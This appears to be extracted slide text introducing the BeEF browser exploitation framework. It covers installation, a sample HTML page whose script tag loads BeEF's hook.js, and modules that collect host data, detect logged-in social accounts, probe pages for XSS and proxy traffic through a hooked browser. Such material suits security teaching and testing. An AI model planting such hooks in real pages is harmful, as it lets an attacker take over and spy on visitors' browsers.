BeEF Advantages+ demonstratestheimpact of browser and CrossSiteScripting in real time+ professional and simpleuser interface+ implemented in Ruby so it will run on most OperatingSystems+ simpleAPI that facilitatesquick development of custommodulesby theuser+ allowscomplex scenarioscombined with other securitytools
Installing On any OSrequiresRuby 1.9, bundler gem and sqliteto beinstalled Download BeEF from SVN Run command ruby install Start with command ruby beef Go to theUI panel addressand login
Test installation Makeapagefrom awebserver call thescript hook.jsto hook that pageandbrowser to beef Run commands<html><head><title> Connected to beef</title></head><body><script src = “http://127.0.0.1:3000/hook.js”/><p>Welcome to our page!</p></body></html>
Case Studies Theuser of BeEF will control which browser willlaunch which command moduleand at which target.
2. Host data Get system info likenumber of processors, maximummemory, freememory, total memory, javaversion
3. Detect social networks Command result showsif user isauthenticated onGmail, Facebook, Twitter
4. XSS Rays & Requester TheXssRaystab allowstheuser to check if links,formsand URI path of thepage(wherethebrowser ishooked) isvulnerableto XSS.
5. Tunneling proxy right-click ahooked browser to useasproxy each request sent through theProxy isrecorded in theHistory panel in theRequester tab click ahistory item to view theHTTPheadersandHTML sourceof theHTTPresponse.